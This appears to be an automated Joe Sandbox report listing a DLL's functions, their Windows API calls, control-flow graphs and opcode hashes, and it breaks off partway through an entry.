    • Opcode ID: 62d3435ecaf67b690040494e715479c48cb913ef0c9a276450b22e2695167ed7
    • Instruction ID: ac85400423f5c659f8c14131d3889ba6e7c23d82175b45f4af381173e65af412
    • Opcode Fuzzy Hash: 62d3435ecaf67b690040494e715479c48cb913ef0c9a276450b22e2695167ed7
    • Instruction Fuzzy Hash: BCB1B8F1A402529BFF00CFA8DCC1B8977E5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10001027 Relevance: 1.8, APIs: 1, Instructions: 294networkCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 2830 10001027-10001155 call 10008f42 * 3 call 10009640 call 10008f42 WSAStartup 2841 10001164-100011a0 call 10009520 2830->2841 2842 10001157-10001161 call 10008f48 2830->2842 2847 100011b1-100011b7 2841->2847 2848 100011a2 2841->2848 2842->2841 2850 100011b9 2847->2850 2851 100011be-100011eb call 10009520 2847->2851 2849 100011a4-100011a8 2848->2849 2852 100011aa-100011ad 2849->2852 2853 100011af 2849->2853 2850->2851 2856 100011fc-100011ff 2851->2856 2857 100011ed 2851->2857 2852->2849 2853->2847 2859 10001201 2856->2859 2860 10001206-10001289 call 10008f3c call 10008f42 call 10001007 2856->2860 2858 100011ef-100011f3 2857->2858 2862 100011f5-100011f8 2858->2862 2863 100011fa 2858->2863 2859->2860 2869 100012a8-100012aa 2860->2869 2870 1000128f-10001290 2860->2870 2862->2858 2863->2856 2872 100012b0 2869->2872 2873 100012da-1000132e call 10008f3c call 1000132f call 10008f3c * 3 2869->2873 2871 10001291-100012a4 call 10008f3c 2870->2871 2882 100012a6-100012a7 2871->2882 2876 100012b2-100012d8 call 10008f42 2872->2876 2876->2873 2882->2869
    APIs
    • WSAStartup.WS2_32(?,00000000), ref: 10001148
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: Startup
    • String ID:
    • API String ID: 724789610-0
    • Opcode ID: 0b9b7ad6b27d15674f0398aaa48fba4813a74bb0a603e7b5ba06d62348bc4f8d
    • Instruction ID: d74f7e4fc3d2271a8ab4d4adfaa925da7f5db712bb5ec264062f05ece0e1d290
    • Opcode Fuzzy Hash: 0b9b7ad6b27d15674f0398aaa48fba4813a74bb0a603e7b5ba06d62348bc4f8d
    • Instruction Fuzzy Hash: 7C8184F6A402025BF740CB68DCC1BAA73E9EF583A4F290075E9059B345E679BD15C722
    Uniqueness

    Uniqueness Score: -1.00%

    Function 1000A7B0 Relevance: 16.7, APIs: 11, Instructions: 162registrystringCOMMON
    Download Yara Rule

    Control-flow Graph

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 1000A7EE
    • strrchr.MSVCRT ref: 1000A817
    • RegOpenKeyA.ADVAPI32(00000000,00000000,?), ref: 1000A830
    • ??2@YAPAXI@Z.MSVCRT ref: 1000A853
    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,00000400,?,?,?,00000698,00000000,00000000,00000000,?), ref: 1000A876
    • ??3@YAXPAX@Z.MSVCRT ref: 1000A884
    • ??2@YAPAXI@Z.MSVCRT ref: 1000A88E
    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,00000698,00000000,00000000,00000000), ref: 1000A8AB
    • ??3@YAXPAX@Z.MSVCRT ref: 1000A8DA
    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000698,00000000,00000000,00000000,?), ref: 1000A8E7
    • ??3@YAXPAX@Z.MSVCRT ref: 1000A8EE
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: ??2@??3@$QueryValue$CloseOpenstrrchr
    • String ID:
    • API String ID: 1380196384-0
    • Opcode ID: 0055807da5042bb647736de19bf315c7cc7080262b94f7f0173f30ff330bb7ad
    • Instruction ID: b054589480694306ed07ebfcb3a54d079748cc68523788b519db9fcbf24356dc
    • Opcode Fuzzy Hash: 0055807da5042bb647736de19bf315c7cc7080262b94f7f0173f30ff330bb7ad
    • Instruction Fuzzy Hash: A04106756003055BF314DB689C45E2B77D8EFC12E0F144A2DFA55C3285EE76ED0A83A2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 1000B390 Relevance: 13.6, APIs: 9, Instructions: 113librarywindowstringCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 681 1000b390-1000b3ac GetModuleHandleA 682 1000b40b-1000b415 681->682 683 1000b3ae-1000b3b9 LoadLibraryA 681->683 686 1000b427-1000b45d strchr 682->686 687 1000b417-1000b425 atoi 682->687 684 1000b3eb-1000b3f9 683->684 685 1000b3bb-1000b3e8 wsprintfA MessageBoxA call 10009390 683->685 689 1000b405-1000b406 684->689 690 1000b3fb 684->690 685->684 692 1000b468 686->692 693 1000b45f-1000b463 686->693 691 1000b46f-1000b47b GetProcAddress 687->691 689->682 690->689 694 1000b4c6-1000b4db 691->694 695 1000b47d-1000b4a6 wsprintfA MessageBoxA call 10009390 691->695 692->691 693->692 697 1000b465 693->697 699 1000b4ab-1000b4c3 695->699 697->692
    APIs
    • GetModuleHandleA.KERNEL32(?), ref: 1000B3A2
    • LoadLibraryA.KERNEL32(?), ref: 1000B3AF
    • wsprintfA.USER32 ref: 1000B3C6
    • MessageBoxA.USER32(00000000,?,1006A09C,00000010), ref: 1000B3DC
      • Part of subcall function 10009390: ExitProcess.KERNEL32 ref: 100093A5
    • atoi.MSVCRT ref: 1000B41B
    • strchr.MSVCRT ref: 1000B453
    • GetProcAddress.KERNEL32(00000000,00000040), ref: 1000B471
    • wsprintfA.USER32 ref: 1000B489
    • MessageBoxA.USER32(00000000,?,1006A09C,00000010), ref: 1000B49F
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: Messagewsprintf$AddressExitHandleLibraryLoadModuleProcProcessatoistrchr
    • String ID:
    • API String ID: 3187504500-0
    • Opcode ID: eaf7c88fcb441d378e7e4088570b6a5866bbed45d5bfb5cc9ea4a237190b3f69
    • Instruction ID: 491f2c0a62f37e4f67161009499e29b69e0f741f7a8c9d6e7004f4b75a98df72
    • Opcode Fuzzy Hash: eaf7c88fcb441d378e7e4088570b6a5866bbed45d5bfb5cc9ea4a237190b3f69
    • Instruction Fuzzy Hash: FC314AB26007555FF320EF24DC84B9B7B98EB85380F004929FB0993246EB75E909CBB5
    Uniqueness

    Uniqueness Score: -1.00%

    Function 100096A0 Relevance: 6.0, APIs: 4, Instructions: 43fileCOMMON
    Download Yara Rule

    Control-flow Graph

    APIs
    • CreateFileA.KERNELBASE(80000004,80000000,00000003,00000000,00000003,00000020,00000000,?,10001489,00000001,10069CDF,00000000,80000004,00000001), ref: 100096B5
    • GetFileSize.KERNEL32(00000000,10069CDF,?,00000268,?,10001489,00000001,10069CDF,00000000,80000004,00000001), ref: 100096CC
      • Part of subcall function 10009430: GetProcessHeap.KERNEL32(1000B517,00000008,00000002,00000000,10009825,00000007,00000003,?,?,1000261C,00000003,00000000,00000000,80000005,00000002,00000000), ref: 10009439
      • Part of subcall function 10009430: RtlAllocateHeap.NTDLL(1006A1D4,00000008,80000301), ref: 1000944D
      • Part of subcall function 10009430: MessageBoxA.USER32(00000000,10069FE8,10069FB4,00000010), ref: 10009466
    • ReadFile.KERNELBASE(00000000,00000008,00000000,?,00000000,00000001), ref: 100096F8
    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 100096FF
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: File$Heap$AllocateChangeCloseCreateFindMessageNotificationProcessReadSize
    • String ID:
    • API String ID: 4143106703-0
    • Opcode ID: 9381e33eb8e62eb59d2cf853d973df5be84e3c18288bfb382a4d906760cea2b3
    • Instruction ID: cdbe4ea1d30985889301e2374bea63683511f888104e621f128e3cfb89859431
    • Opcode Fuzzy Hash: 9381e33eb8e62eb59d2cf853d973df5be84e3c18288bfb382a4d906760cea2b3
    • Instruction Fuzzy Hash: 37F04476201310BBF3119F64DCC9FAB77BCEB84B90F104A1EF646961D5E670A5058771
    Uniqueness

    Uniqueness Score: -1.00%

    Function 100835C2 Relevance: 3.2, APIs: 2, Instructions: 209memoryCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 994 100835c2-100835e1 call 10083882 997 100835ed-100835f4 994->997 998 100835e3-100835eb 994->998 1000 100835f7-100835fa 997->1000 999 10083603-1008361d 998->999 1005 10083624-1008362b 999->1005 1001 100835fc-10083600 1000->1001 1002 10083632-10083658 VirtualFree 1000->1002 1001->999 1003 10083699-100836aa call 100837d8 1002->1003 1004 1008365a-1008365d 1002->1004 1013 100836b0-100836b5 1003->1013 1014 10083731-10083743 1003->1014 1006 1008365f-10083661 1004->1006 1005->1002 1008 1008362d-10083630 1005->1008 1006->1004 1009 10083663-10083669 1006->1009 1008->1000 1011 1008366b-1008366f 1009->1011 1012 1008367f-10083687 1009->1012 1011->1004 1015 10083671-1008367d 1011->1015 1016 10083689-10083697 1012->1016 1013->1014 1019 100836b7-100836ca 1013->1019 1017 10083784-10083793 1014->1017 1018 10083745-1008375e 1014->1018 1015->1016 1016->1003 1016->1006 1020 100837bd-100837c5 1017->1020 1021 10083795-1008379c 1017->1021 1031 10083921-10083929 1018->1031 1032 10083764-1008377d 1018->1032 1022 100836cc-100836d4 1019->1022 1023 100836d6-100836db 1019->1023 1025 100837d1-100837d2 1020->1025 1026 100837c7-100837ce 1020->1026 1024 1008379e-100837bb VirtualProtect 1021->1024 1028 100836de-100836e5 1022->1028 1023->1028 1024->1020 1024->1024 1025->1031 1029 10083707-10083710 1028->1029 1030 100836e7-100836e9 1028->1030 1029->1014 1035 10083712-10083715 1029->1035 1033 100836eb-100836ef 1030->1033 1034 100836f1-100836fe 1030->1034 1032->1017 1033->1028 1034->1033 1036 10083700-10083705 1034->1036 1037 1008371f-10083721 1035->1037 1038 10083717-1008371d 1035->1038 1036->1033 1040 10083724-10083727 1037->1040 1038->1035 1040->1014 1041 10083729-1008372f 1040->1041 1041->1040
    APIs
    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 1008363F
    • VirtualProtect.KERNELBASE(?,?,7373652D,73736297,?,7373652D,00000000,73736297), ref: 100837AE
    Memory Dump Source
    • Source File: 00000000.00000002.333086536.0000000010080000.00000040.00000800.00020000.00000000.sdmp, Offset: 10080000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10080000_loaddll32.jbxd
    Similarity
    • API ID: Virtual$FreeProtect
    • String ID:
    • API String ID: 2581862158-0
    • Opcode ID: 5116512cfd6bf09bdea013bebf5e822baf0d3f282df84516e26171709676dcb2
    • Instruction ID: cbfd066a6669cc03ceefd0d281f04ad6062c5cf2e557b09b294620d1cb926219
    • Opcode Fuzzy Hash: 5116512cfd6bf09bdea013bebf5e822baf0d3f282df84516e26171709676dcb2
    • Instruction Fuzzy Hash: C5612572E04210AFDB21CA18CC847AAB7A1FFC5350F74C4A6D8899B391E775AD92CB50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10009730 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 2891 10009730-10009750 GetModuleFileNameA 2892 10009781-100097c0 call 10009430 2891->2892 2893 10009752-1000976b 2891->2893 2894 1000976d-10009773 2893->2894 2895 1000977e 2893->2895 2894->2892 2897 10009775-1000977c 2894->2897 2895->2892 2897->2894 2897->2895
    APIs
    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 10009748
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: FileModuleName
    • String ID:
    • API String ID: 514040917-0
    • Opcode ID: 40b6032b54c681fbc88b876d943579c68bbc1329a76c471047c3c84e3496b9bc
    • Instruction ID: cb8d5cf13dd1d9b5e2a832ac6758e92f586921095f236dd965c20446dbb83220
    • Opcode Fuzzy Hash: 40b6032b54c681fbc88b876d943579c68bbc1329a76c471047c3c84e3496b9bc
    • Instruction Fuzzy Hash: 3E0149356285100BF308D5389C556AB7BC1EBC03A0F94472DFA6AC31D5DF64DD0AC380
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10009710 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 2899 10009710-10009720 SetFileAttributesA
    APIs
    • SetFileAttributesA.KERNELBASE(00000000,00000002,10007744,00000002,00000000,00000000,80000004,00000002,00000000,80000301,00000000,10069CE3,10069CDB,100695C2,00000000), ref: 1000971A
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: AttributesFile
    • String ID:
    • API String ID: 3188754299-0
    • Opcode ID: 2708e965b174b85047c8d0145172c59c26a25c7f0d4e6f625563eef8cc2badcf
    • Instruction ID: ba1b9f9736472015c9caeb0e2b2585a1f4e95ecc7d51d8cd3f73c6f4105449ec
    • Opcode Fuzzy Hash: 2708e965b174b85047c8d0145172c59c26a25c7f0d4e6f625563eef8cc2badcf
    • Instruction Fuzzy Hash: 7EB092B4104201ABDA04DB10C984D2A77A8AB84280F004848B44982110C630D844CA32
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10083555 Relevance: 1.3, APIs: 1, Instructions: 32memoryCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 2900 10083555-10083567 2901 10083569-10083575 2900->2901 2902 1008357b-100835b1 VirtualAlloc 2900->2902 2901->2902 2903 100837bd-100837c5 2901->2903 2904 10083921-10083929 2902->2904 2905 100835b7-100835bd call 100835c2 2902->2905 2906 100837d1-100837d2 2903->2906 2907 100837c7-100837ce 2903->2907 2905->2904 2906->2904
    APIs
    • VirtualAlloc.KERNELBASE(00000000,00001000,00001000,00000040), ref: 100835A9
    Memory Dump Source
    • Source File: 00000000.00000002.333086536.0000000010080000.00000040.00000800.00020000.00000000.sdmp, Offset: 10080000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10080000_loaddll32.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: 249bba57007782f45bf0e84b72b43045c2c6b24cb456ac19ab3cd77c178e24dd
    • Instruction ID: 0e55dd4c9f7470d52eab4346b396aa946e407808a0d127f0e42209d590d0d6a2
    • Opcode Fuzzy Hash: 249bba57007782f45bf0e84b72b43045c2c6b24cb456ac19ab3cd77c178e24dd
    • Instruction Fuzzy Hash: 97F04F35D483688BDF61CE248C0C7D9BBB0AB40340F0144D9E9C977295D6B46EC68F54
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    Function 10007FFC Relevance: 3.7, APIs: 2, Instructions: 657processCOMMON
    Download Yara Rule
    APIs
    • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 10008096
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 100086E3
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: CloseCreateHandleSnapshotToolhelp32
    • String ID:
    • API String ID: 3280610774-0
    • Opcode ID: a3d588b356a1e94a5384f0c322a994dc616931ecb6bd367115764d94705bd62c
    • Instruction ID: 38736623510dd92dfdc6f151b1854b3b81c47a036c1233556d8952d06ecfa9b7
    • Opcode Fuzzy Hash: a3d588b356a1e94a5384f0c322a994dc616931ecb6bd367115764d94705bd62c
    • Instruction Fuzzy Hash: 342218B1E402469BFB40CFA8DCC1B99B7E5FF18394F240474E946AB345E779AA50CB21
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10008779 Relevance: 3.4, APIs: 2, Instructions: 417COMMON
    Download Yara Rule
    APIs
    • OpenProcess.KERNEL32(00000410,00000000,100083C0), ref: 100087F6
    • VirtualQueryEx.KERNEL32(00000000,00000000,?,0000001C), ref: 10008AA5
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: OpenProcessQueryVirtual
    • String ID:
    • API String ID: 4117617775-0
    • Opcode ID: 70f9a9ccbcda7bfbacb10c953a6d3799ea928e4c02d333ecc74af9e824fbae17
    • Instruction ID: 8c550e5897e47adf7599d0c38adf365a71993dea935fb9261ba99f324ccd0614
    • Opcode Fuzzy Hash: 70f9a9ccbcda7bfbacb10c953a6d3799ea928e4c02d333ecc74af9e824fbae17
    • Instruction Fuzzy Hash: C1E151B1E40209ABFF40DF94DC82BEDBBB5FB09380F141069F645B6285D7759E108B66
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10006272 Relevance: 3.3, APIs: 2, Instructions: 293threadCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 100065CF: GetClassNameA.USER32(100062B3,00000000,00000032), ref: 10006626
    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 10006333
    • GetCurrentProcessId.KERNEL32 ref: 10006352
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: Process$ClassCurrentNameThreadWindow
    • String ID:
    • API String ID: 1921375019-0
    • Opcode ID: 170ead326dcf4de6e011019e759cec7ab213f3322a509e3b813c2885cdcdba78
    • Instruction ID: 65f13f7fa592221a2cc14f624868cd569e85eb347412389996fc533d2a6223ba
    • Opcode Fuzzy Hash: 170ead326dcf4de6e011019e759cec7ab213f3322a509e3b813c2885cdcdba78
    • Instruction Fuzzy Hash: 629147B5E003469BFB40DFA4DCC2BAE76F9EB183C1F240035E605B6249D675AB44CB62
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10008C8B Relevance: 3.1, APIs: 2, Instructions: 115COMMON
    Download Yara Rule
    APIs
    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,FFFFFFFF,00000000,00000000,00000000,00000000), ref: 10008CEF
    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,FFFFFFFF,?,00000000,00000000,00000000), ref: 10008DB3
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: ByteCharMultiWide
    • String ID:
    • API String ID: 626452242-0
    • Opcode ID: 6f183110c026c84c04af3eeea6ac243ff9b50441e84c7bee0904981d56cbbfaf
    • Instruction ID: b2204c503d4b45a11d8d4794e524eac4d7a4f7d29a545cc7e2177c5ab4488784
    • Opcode Fuzzy Hash: 6f183110c026c84c04af3eeea6ac243ff9b50441e84c7bee0904981d56cbbfaf
    • Instruction Fuzzy Hash: D73161B5E40308BBFB00DFE48C42FAE7774EB09790F104165FA14BA2C5E6B26B109B55
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10005D6F Relevance: 3.1, APIs: 2, Instructions: 86COMMON
    Download Yara Rule
    APIs
    • GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
    • GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: EnvironmentVariable
    • String ID:
    • API String ID: 1431749950-0
    • Opcode ID: dd9b6342d2937d58137bced8a11c896fce8ab240bf7edca7611241b9c1f55b8c
    • Instruction ID: 6cdedaa81d41af03f281cecd9e0ac06adb9cc61991aa70c549593c09617ecf69
    • Opcode Fuzzy Hash: dd9b6342d2937d58137bced8a11c896fce8ab240bf7edca7611241b9c1f55b8c
    • Instruction Fuzzy Hash: BB21C5B5D14204BFFB40DFE4DC46BAFB7B9EB19281F10407AF505B6245E63297409B61
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10005F47 Relevance: 3.1, APIs: 2, Instructions: 85stringCOMMON
    Download Yara Rule
    APIs
    • lstrcpyn.KERNEL32(00000001,00000001,00000000,100695BA,100695C2,00000000), ref: 10005FCD
    • RtlMoveMemory.NTDLL(00000000,00000000,00000004), ref: 10006013
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: MemoryMovelstrcpyn
    • String ID:
    • API String ID: 1494768595-0
    • Opcode ID: 5ad4a69017691164163502b9bdba77a4c0536bd206595950376a56159c79dbb4
    • Instruction ID: 1ea9432bcf4f249db5516a5a12c7da5338a9f2cd1788626185d980f8ef2a5bd8
    • Opcode Fuzzy Hash: 5ad4a69017691164163502b9bdba77a4c0536bd206595950376a56159c79dbb4
    • Instruction Fuzzy Hash: 9E2131B4D4020A9BFB00DF95C986BBFBBB8EB093D2F014065E944E7245D636D910CB65
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10005E5F Relevance: 2.6, APIs: 2, Instructions: 79COMMON
    Download Yara Rule
    APIs
    • CloseHandle.KERNEL32(00000000,?,10005668,00000000,00000000), ref: 10005EAC
    • CloseHandle.KERNEL32(00000000,?,10005668,00000000,00000000), ref: 10005ED8
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: CloseHandle
    • String ID:
    • API String ID: 2962429428-0
    • Opcode ID: 7c947d757b40d2b1d0a58a98e59bc80ae9684e0590784dd83700156d9b6bac4d
    • Instruction ID: 36467d162fe4f9701ac00e92914ba883088f779945990f223c5d709893f0a5e0
    • Opcode Fuzzy Hash: 7c947d757b40d2b1d0a58a98e59bc80ae9684e0590784dd83700156d9b6bac4d
    • Instruction Fuzzy Hash: 883130B4A00318EBEF00DF94D9C1B9EBB70FB0E351F1050A5EA486B356C7716A54DBA6
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10007779 Relevance: 2.1, APIs: 1, Instructions: 607registryCOMMON
    Download Yara Rule
    APIs
    • RegEnumKeyA.ADVAPI32(00000000,00000000,00000000,00000100), ref: 10007A09
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: Enum
    • String ID:
    • API String ID: 2928410991-0
    • Opcode ID: b884ab7ece2f1b32e4ec299f3d775985568a37b4b490ae73499c4694e5a8569b
    • Instruction ID: 19f3e0f09fb3139a84b485e618a0b4e3a9896e817ec9bcb65a1afd8503e1739f
    • Opcode Fuzzy Hash: b884ab7ece2f1b32e4ec299f3d775985568a37b4b490ae73499c4694e5a8569b
    • Instruction Fuzzy Hash: D72231B5E10345ABFB40DFA4DC82FEE76B9FB18380F104029F609B6246D775AA148B61
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10001F4E Relevance: 1.9, APIs: 1, Instructions: 415COMMON
    Download Yara Rule
    APIs
    • RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 100021D0
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: MemoryMove
    • String ID:
    • API String ID: 1951056069-0
    • Opcode ID: 6357fa78dd07092ed7b8ec5f174093f8b475fdda17e0ea97ef392f0482d7b954
    • Instruction ID: e8c117cfe2ce38e7afd1dfb50a3cc70b11c57987397a8387b1c431efdec99ce4
    • Opcode Fuzzy Hash: 6357fa78dd07092ed7b8ec5f174093f8b475fdda17e0ea97ef392f0482d7b954
    • Instruction Fuzzy Hash: E5D128B1A402169BFB00DFA8ECC179AB7B5FF59360F290071E845AB305D779B961CB21
    Uniqueness

    Uniqueness Score: -1.00%

    Function 1000283C Relevance: 1.8, APIs: 1, Instructions: 340COMMON
    Download Yara Rule
    APIs
    • RtlMoveMemory.NTDLL(00000000,00000000,-00000010), ref: 10002A65
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: MemoryMove
    • String ID:
    • API String ID: 1951056069-0
    • Opcode ID: 372bcd23a16c4afc00cfeed12af7c10c30c128285ea9e092f3487714d21a6a8e
    • Instruction ID: 51266079e0ab4eef95ca9e37e254d61767b009aba728a03217fb4b113baa9e8e
    • Opcode Fuzzy Hash: 372bcd23a16c4afc00cfeed12af7c10c30c128285ea9e092f3487714d21a6a8e
    • Instruction Fuzzy Hash: 4BC13CB1940216CBFB00DF98ECC179EBBB4FF59350F2544A0E485AB308D779A961CB21
    Uniqueness

    Uniqueness Score: -1.00%

    Function 1000667B Relevance: 1.6, APIs: 1, Instructions: 83COMMON
    Download Yara Rule
    APIs
    • GetWindowTextA.USER32(00000000,00000000,00000000), ref: 10006717
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: TextWindow
    • String ID:
    • API String ID: 530164218-0
    • Opcode ID: d12c1f6d40171915a5fc2066c984583a2dde13af0dea6e97dc6d2baf1a56417a
    • Instruction ID: af8ab54a7c013c171f08a0941b8caac9ca2036b1d5b4c92accab96e623d9bf20
    • Opcode Fuzzy Hash: d12c1f6d40171915a5fc2066c984583a2dde13af0dea6e97dc6d2baf1a56417a
    • Instruction Fuzzy Hash: BB2151B5D00209FBFF40DFA0DC86BAEBBB5EB09380F1050A5F504B6145DB765660DB51
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10006984 Relevance: 1.6, APIs: 1, Instructions: 82memoryCOMMON
    Download Yara Rule
    APIs
    • VirtualProtect.KERNEL32(0000FF14,1000680C,00000040,1000680C,1000680C), ref: 100069C5
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: ProtectVirtual
    • String ID:
    • API String ID: 544645111-0
    • Opcode ID: fd8397a20bc2ee09d00d35ddeceaf15d5e0bef245b9d097c416383342cee3638
    • Instruction ID: df1c2df5a7203cfc9315f3c512ba7d90f5e17f6ccad0b77d960eb1cbbc18c7eb
    • Opcode Fuzzy Hash: fd8397a20bc2ee09d00d35ddeceaf15d5e0bef245b9d097c416383342cee3638
    • Instruction Fuzzy Hash: E5212775E00208FBFB40DFA4DC81BAD77B9EB09390F208065FA08BA145D7759B549B56
    Uniqueness

    Uniqueness Score: -1.00%

    Function 100065CF Relevance: 1.6, APIs: 1, Instructions: 61COMMON
    Download Yara Rule
    APIs
    • GetClassNameA.USER32(100062B3,00000000,00000032), ref: 10006626
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: ClassName
    • String ID:
    • API String ID: 1191326365-0
    • Opcode ID: 5f3d0cc3c76e46f5f31987359fa37c2af6f4afc302266c4a070b6cef010a1ded
    • Instruction ID: 88cd5166ace32fdf3bf965dc2fc27c67ee1adcda26424863b8a0ec8378a40cf0
